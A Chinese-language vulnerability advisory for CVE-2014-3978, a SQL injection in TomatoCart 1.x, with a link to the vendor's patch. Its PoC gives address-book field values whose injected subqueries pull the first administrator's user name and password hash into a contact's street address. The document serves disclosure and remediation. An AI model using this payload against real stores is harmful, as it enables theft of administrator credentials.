TomatoCart SQL注入漏洞
发布日期:2014-08-09
更新日期:2014-08-11
受影响系统:
TomatoCart TomatoCart 1.x
描述:
--------------------------------------------------------------------------------
CVE(CAN) ID: CVE-2014-3978
TomatoCart是开源的电子商务解决方案。
TomatoCart在query factory内存在系统性漏洞,可使攻击者执行远程SQL注入攻击。
<*来源:Breaking.Technology
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
PoC:
Create a new contact in your address book using the following values.
First name: :entry_lastname,
Last Name : ,(select user_name from toc_administrators order by id asc limit 1),(select user_password from toc_administrators order by id asc limit 1),3,4,5,6,7,8,9,10)#
The new contact will be added to your address book with the admin hash as the contact's street address
建议:
--------------------------------------------------------------------------------
厂商补丁:
TomatoCart
----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
https://github.com/tomatocart/TomatoCart-v1/pull/238